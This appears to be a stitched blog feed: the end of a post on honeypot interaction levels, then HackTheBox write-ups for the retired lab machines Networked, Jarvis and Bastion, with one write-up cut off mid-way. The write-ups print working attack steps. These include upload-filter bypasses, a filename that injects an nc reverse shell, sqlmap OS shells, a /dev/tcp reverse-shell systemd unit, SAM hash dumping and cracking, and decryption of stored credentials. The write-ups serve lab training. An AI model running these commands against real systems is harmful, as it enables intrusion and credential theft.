Finally, high interaction Honeypots represent a fully functioning implementation of the protocol in question, often made available through a Man-in-the-Middle (MitM) proxy which logs every interaction with the HP. For SSH this is represented by <a href="https://github.com/eg-cert/dockpot">Dockpot</a>, a HP that runs a full Linux system in an image, exposing the SSH connection through a MitM proxy that logs all interactions and issued commands. For every connection from a distinct source IP, a new container is created and kept until a timeout is reached. This not only enables connection separation but also persistence across connections, as the attacker finds the filesystem with all changes and additions made during the first connection.
All three groups have their advantages and use cases. While detail and insight grow from using low to high interaction Honeypots, the error potential, attack surface, hardware demand and general complexity increase as well.<br />
<img src="/images/interaction-stack.png" alt="Graphic that illustrates that detail and insight grow when moving from low to high interaction honeypots, but that also error potential, attack surface, hw demand and complexity grow." /><br />
Low and medium interaction HPs are often developed as scripts run by an interpreter, e.g. Python. While they provide limited insight and are relatively easy to detect, they can be installed on virtually any OS able to run a fitting Python distribution. This could be anything ranging from a Raspberry Pi up to fully fledged standalone hardware or cloud deployments.<br />
High interaction HPs are often based on virtualization or containerization technologies and require a more advanced setup. This includes using sufficiently powerful hardware, configuring the abstraction layer, and setting up VMs or containers.<br />
Therefore, goals, budget, and time constraints should be known before deciding which Honeypot will be deployed.</p>
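<p>As a toy illustration of the low-interaction end of this spectrum, the sketch below presents an SSH-style banner and records whatever banner the connecting client sends back. The banner string, function name, and logging format are illustrative and not taken from any real honeypot:</p>

```python
import socket
import threading

def run_banner_honeypot(host="127.0.0.1", port=0):
    """Serve a single connection: send a fake SSH banner, log the peer's
    address and banner line, then shut down. Returns (port, log, thread)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    log = []

    def handle():
        conn, addr = srv.accept()
        with conn:
            conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")  # look like a real sshd
            data = conn.recv(256)                     # the client's banner
            log.append((addr[0], data.strip().decode(errors="replace")))
        srv.close()

    t = threading.Thread(target=handle, daemon=True)
    t.start()
    return srv.getsockname()[1], log, t
```

<p>A real low-interaction HP would keep accepting connections and continue into the authentication phase to harvest credentials; this sketch stops at the banner exchange.</p>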
<p>Continue reading about deploying and customizing your honeypot in <a href="/2020/11/24/honeypot-deyploment">Part 2</a>!</p>Honeypots can provide valuable insights into the threat landscape, both in the open internet as well as your internal network. Deploying them right is not always straightforward, just like interpreting any activity on them.HTB - Networked2020-06-07T22:00:00+00:002020-06-07T22:00:00+00:00https://maddosaurus.github.io/2020/06/07/htb-networked<p>Writeup for the retired HTB machine Networked<br />
Link: https://www.hackthebox.eu/home/machines/profile/203<br />
IP: 10.10.10.146</p>
<!--more-->
<h2 id="recon">Recon</h2>
<p>The box has a web service running on port 80, so common URL paths are in focus.</p>
<h2 id="gobuster">gobuster</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/index.php (Status: 200)
/uploads (Status: 301)
/photos.php (Status: 200)
/upload.php (Status: 200)
/lib.php (Status: 200)
/backup (Status: 301)
</code></pre></div></div>
<p>A complete backup of the website source code can be found in the <code class="language-plaintext highlighter-rouge">/backup</code> folder.<br />
As code access is at hand, the next step is to try and get a webshell up and running.<br />
It seems that upload filters are in place, which <a href="https://github.com/xapax/security/blob/master/bypass_image_upload.md">can be tricked</a>.<br />
The uploader can be tricked by renaming the payload to <code class="language-plaintext highlighter-rouge">file.php;.jpg</code>. This renders the last extension as a comment for PHP but bypasses the filter.
This results in the file being uploaded and makes the shell available for use.</p>
<h2 id="getting-a-full-user">Getting a full user</h2>
<p>Enumerating common privilege escalation paths, a regularly running cron job named <code class="language-plaintext highlighter-rouge">check_attack.php</code> can be discovered in the user home folder.</p>
<p>The script does its heavy lifting in <code class="language-plaintext highlighter-rouge">/var/www/html/uploads</code> and <a href="https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt">based on tricks shared in this article</a>, one could try to create a file with a name like<br />
<code class="language-plaintext highlighter-rouge">touch ";nc -c bash 10.10.15.195 4444"</code><br />
Which yields an incoming connection with user privileges (<em>guly</em>) on the next cron run.</p>
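<p>The reason the touch trick works can be demonstrated locally. The loop below is a stand-in for the cron job’s behavior, and the marker filename is purely illustrative (on the box, the injected command is the nc reverse shell instead):</p>

```python
import os
import subprocess
import tempfile

def naive_cron_pass(directory):
    # Stand-in for the vulnerable cron job: every filename is interpolated
    # unquoted into a shell command line, so shell metacharacters inside
    # the name are parsed and executed.
    for name in os.listdir(directory):
        subprocess.run("echo " + name, shell=True, cwd=directory,
                       stdout=subprocess.DEVNULL)

def demo():
    with tempfile.TemporaryDirectory() as d:
        # The filename itself carries a command, like the touch payload
        # above; here it just drops a marker file instead of a shell.
        open(os.path.join(d, ";touch injected_marker"), "w").close()
        naive_cron_pass(d)
        return os.path.exists(os.path.join(d, "injected_marker"))
```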
<h2 id="road-to-root">Road to root</h2>
<p>Checking common escalation paths from this user, it turns out the user is allowed to run a script named <code class="language-plaintext highlighter-rouge">changename.sh</code> with root privileges.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>---
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
</code></pre></div></div>
<p>Looking at <code class="language-plaintext highlighter-rouge">changename.sh</code> shows that the goal is to escape the predefined variables.<br />
After close inspection it turns out that if all names are filled in without spaces and the last variable is set to <code class="language-plaintext highlighter-rouge">asd bash</code>, a root shell is spawned.</p>
Link: https://www.hackthebox.eu/home/machines/profile/194<br />
IP: 10.10.10.143</p>
<!--more-->
<h2 id="recon">Recon</h2>
<p>nmap reveals a very limited port selection:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
5355/tcp filtered llmnr
64999/tcp open http Apache httpd 2.4.25 ((Debian))
</code></pre></div></div>
<p>The web page on port 80 is a PHP site with not much to see at first glance.<br />
On port 64999 you’ll get a blank page with “Hey you have been banned for 90 seconds, don’t be bad” on the first call.<br />
As a preliminary investigation, gobuster is used to find additional content on the webserver.</p>
<h2 id="gobuster-port-80">Gobuster port 80</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/images (Status: 301)
/index.php (Status: 200)
/nav.php (Status: 200)
/footer.php (Status: 200)
/back.php (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 301)
/connection.php (Status: 200)
/room.php (Status: 302)
/sass (Status: 301)
/server-status (Status: 403)
</code></pre></div></div>
<p>Exploring the website leads to odd behavior when the Room Booking parameter (http://10.10.10.143/room.php?cod=1) is manipulated. Judging from these reactions and the URL schema, a closer inspection for SQL injection was the next step.</p>
<h2 id="sqlmap">SQLMap</h2>
<p>Running SQLMap with the dump parameter executes successfully:
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --dump</code></p>
<p>As a next step, a password dump is attempted with <em>rockyou.txt</em> as dictionary file:
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --passwords</code>
which is successful:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[10:43:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
(...)
[10:44:04] [INFO] starting dictionary-based cracking (mysql_passwd)
[10:44:04] [INFO] starting 2 processes
[10:44:04] [INFO] cracked password 'imissyou' for user 'DBadmin' (...)
database management system users password hashes:
[*] DBadmin [1]:
password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
clear-text password: imissyou
</code></pre></div></div>
<p>With these credentials, logging into phpMyAdmin is possible. As SQLMap is also able to spawn shells under certain circumstances, this is worth trying as well:<br />
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --os-shell</code><br />
which yields a shell as <code class="language-plaintext highlighter-rouge">www-data</code>. By looking around a bit, we learn that the target OS user is named <code class="language-plaintext highlighter-rouge">pepper</code>.<br />
Also, there’s an interesting script in <code class="language-plaintext highlighter-rouge">/var/www/Admin-Utilities</code>, it’s <code class="language-plaintext highlighter-rouge">simpler.py</code>.<br />
Again, with SQLMap, this file can be downloaded:<br />
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --file-read=/var/www/Admin-Utilities/simpler.py</code>
On closer inspection, the script seems to execute actions in the user home folder of pepper. As this script is executed as <em>www-data</em>, there must be a sudo entry to run it as <em>pepper</em>. This can be confirmed by running <code class="language-plaintext highlighter-rouge">sudo -l</code>:<br />
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --os-cmd="sudo -l"</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
</code></pre></div></div>
<p>At this point, a switch to a fully interactive session is needed. This can be achieved by running a local webserver on the attacker machine and serving a prepared PHP reverse shell (<em>apalaxsh.php</em>) that is downloaded via <code class="language-plaintext highlighter-rouge">wget</code> or <code class="language-plaintext highlighter-rouge">curl</code> to the target system’s web dir (www-data).
With a running netcat receiver on the attacker machine (<code class="language-plaintext highlighter-rouge">nc -nvlp 9999</code>), the shell is triggered by pointing a browser to <code class="language-plaintext highlighter-rouge">/apalaxsh.php</code>, which yields a shell.</p>
<h2 id="road-to-user">Road to user</h2>
<p>Now the script can be further examined in its native run environment as sudoed user:<br />
<code class="language-plaintext highlighter-rouge">sudo --user=pepper /var/www/Admin-Utilities/simpler.py</code></p>
<p>This <a href="https://packetstormsecurity.com/files/144749/Infoblox-NetMRI-7.1.4-Shell-Escape-Privilege-Escalation.html">article on Infoblox Shell Escape</a> provides some ideas on how to escape via sudo/ping:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259[...]: Temporary failure in name resolution
</code></pre></div></div>
<p>which yields the user flag.<br />
But this is not everything this shell can do. By upgrading the shell to a full interactive shell first (<code class="language-plaintext highlighter-rouge">python -c 'import pty; pty.spawn("/bin/sh")'</code>),<br />
we’re able to spawn a shell as pepper:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(/bin/bash)
$(/bin/bash)
pepper@jarvis:/$
</code></pre></div></div>
<p>This shell isn’t perfectly working, so it is upgraded to a full reverse shell. With nc running on port 8989, this command yields a fully functioning shell:<br />
<code class="language-plaintext highlighter-rouge">socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.195:8989</code></p>
<h2 id="road-to-root">Road to root</h2>
<p>Exploring privilege escalation routes, it turns out that systemctl has the <em>SETUID</em> bit set, meaning it can run with root privileges.
Creating a systemd service that spawns a reverse shell as root is therefore possible:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=Black magic happening, avert your eyes
[Service]
RemainAfterExit=yes
Type=simple
ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.15.195/8888; cat <&5 | while read line; do $line 2>&5 >&5; done"
[Install]
WantedBy=default.target
</code></pre></div></div>
<p>Then make use of systemctl link to link the service file into the correct position:<br />
<code class="language-plaintext highlighter-rouge">systemctl link /home/pepper/apalax.service</code>
and start it, thereby opening the connection to port 8888 on our machine:<br />
<code class="language-plaintext highlighter-rouge">systemctl start --now apalax</code></p>
<p>This spawns a minimal shell that is functioning enough to print the contents of <code class="language-plaintext highlighter-rouge">root.txt</code>.</p>Writeup for the retired HTB machine Jarvis Link: https://www.hackthebox.eu/home/machines/profile/194 IP: 10.10.10.143HTB - Bastion2020-06-06T19:00:00+00:002020-06-06T19:00:00+00:00https://maddosaurus.github.io/2020/06/06/htb-bastion<p>Writeup for the retired HTB machine Bastion<br />
Link: https://www.hackthebox.eu/home/machines/profile/186<br />
IP: 10.10.10.134</p>
<!--more-->
<h2 id="recon">Recon</h2>
<p>A quick portscan reveals multiple open ports:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
</code></pre></div></div>
<h2 id="smb">SMB</h2>
<p>A closer investigation of the SMB service reveals that it is allowing anonymous access with disabled message signing, which in turn enables public enumeration.<br />
<code class="language-plaintext highlighter-rouge">msf5 > use auxiliary/scanner/smb/pipe_auditor</code><br />
This yields some interesting endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] 10.10.10.134:445 - Pipes: \netlogon, \lsarpc, \samr, \atsvc, \epmapper, \eventlog, \InitShutdown, \lsass, \LSM_API_service, \ntsvcs, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">msf5 > use auxiliary/scanner/smb/smb_enumshares</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[-] 10.10.10.134:139 - Login Failed: Unable to Negotiate with remote host
[+] 10.10.10.134:445 - ADMIN$ - (DISK) Remote Admin
[+] 10.10.10.134:445 - Backups - (DISK)
[+] 10.10.10.134:445 - C$ - (DISK) Default share
[+] 10.10.10.134:445 - IPC$ - (IPC) Remote IPC
</code></pre></div></div>
<p>So let’s look into the shares.
First, let’s mount the Backups share:<br />
<code class="language-plaintext highlighter-rouge">sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/</code>
A backup of a full client machine can be discovered at <code class="language-plaintext highlighter-rouge">WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351</code>.</p>
<h2 id="the-backup">The Backup</h2>
<p>Copying this VHD and mounting it on Linux enables a closer investigation:
<code class="language-plaintext highlighter-rouge">sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/guest/</code></p>
<p>With an unbooted Windows installation like this, it is possible to copy registry hives from <code class="language-plaintext highlighter-rouge">C:\Windows\system32\config\</code> and dump the NTHash for the users:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apalax@raudfjorden:~/writeups/HTB/Labs/Bastion$ pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
</code></pre></div></div>
<p>The syntax for these hashes is <code class="language-plaintext highlighter-rouge">username:id:LM-Hash:NT-Hash</code>. These are then copied into <code class="language-plaintext highlighter-rouge">hashes.txt</code> and handed off to john for a dictionary attack:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>john --format=nt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2019-09-05 19:36) 2.222g/s 10439Kp/s 10439Kc/s 10444KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
</code></pre></div></div>
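<p>The pwdump lines follow the username:id:LM-Hash:NT-Hash format noted above. A small parser can also flag the two well-known empty-password hashes, which explains why john reports an empty password for Administrator (function and field names here are illustrative):</p>

```python
# Well-known hashes of the empty password (LM and NT respectively).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def parse_pwdump(line):
    # pwdump format: username:id:LM-Hash:NT-Hash:::
    user, rid, lm, nt = line.strip().rstrip(":").split(":")[:4]
    return {
        "user": user,
        "rid": int(rid),
        "lm_unused": lm.lower() == EMPTY_LM,       # LM hashing disabled
        "blank_password": nt.lower() == EMPTY_NT,  # NT hash of ""
        "nt": nt,
    }
```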
<p>So it seems we have a user login / password combination.<br />
If we connect via SSH, we’re dropped into a CMD (?).<br />
<code class="language-plaintext highlighter-rouge">user.txt</code> can be found at the desktop and printed with <code class="language-plaintext highlighter-rouge">type user.txt</code>.</p>
<h2 id="road-to-root">Road to root</h2>
<p>A first attempt was to make use of Matt Graeber’s tool, PowerSploit.</p>
<p>First, Powersploit needs to be downloaded:<br />
<code class="language-plaintext highlighter-rouge">wget http://10.10.15.195:8000/PowerSploit-3.0.0.zip -OutFile ps.zip</code><br />
Then extract the Privesc folder into the PS module path, import the module and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Import-Module Privesc
Get-Command -Module Privesc
<available commands>
Invoke-AllChecks
<stuff stuff>
(...)
[*] Checking %PATH% for potentially hijackable .dll locations...
HijackablePath : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' -Command '...'
</code></pre></div></div>
<p>This seems not to work, however. Poking around, an SSH config file reveals:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Match Group administrators
AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
</code></pre></div></div>
<p>unfortunately, we don’t have write access to that folder as user, so another path for privilege escalation is needed.</p>
<h3 id="mremoteng">mRemoteNG</h3>
<p>A more thorough investigation reveals that mRemoteNG, a remote administration tool, is installed.<br />
On closer examination it turns out that this software suffers from insecure password storage.<br />
The credentials are stored in <code class="language-plaintext highlighter-rouge">confCons.xml</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> type .\confCons.xml
</code></pre></div></div>
<p>Which can be decrypted with <a href="https://github.com/haseebT/mRemoteNG-Decrypt">mremoteng-decrypt</a>.<br />
This is done by passing the encrypted Administrator password string to the decrypter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
</code></pre></div></div>
<p>This yields the password for the Administrator account. Connect, <code class="language-plaintext highlighter-rouge">cd</code> to Desktop and print the flag with <code class="language-plaintext highlighter-rouge">type root.txt</code>.</p>Writeup for the retired HTB machine Bastion Link: https://www.hackthebox.eu/home/machines/profile/186 IP: 10.10.10.134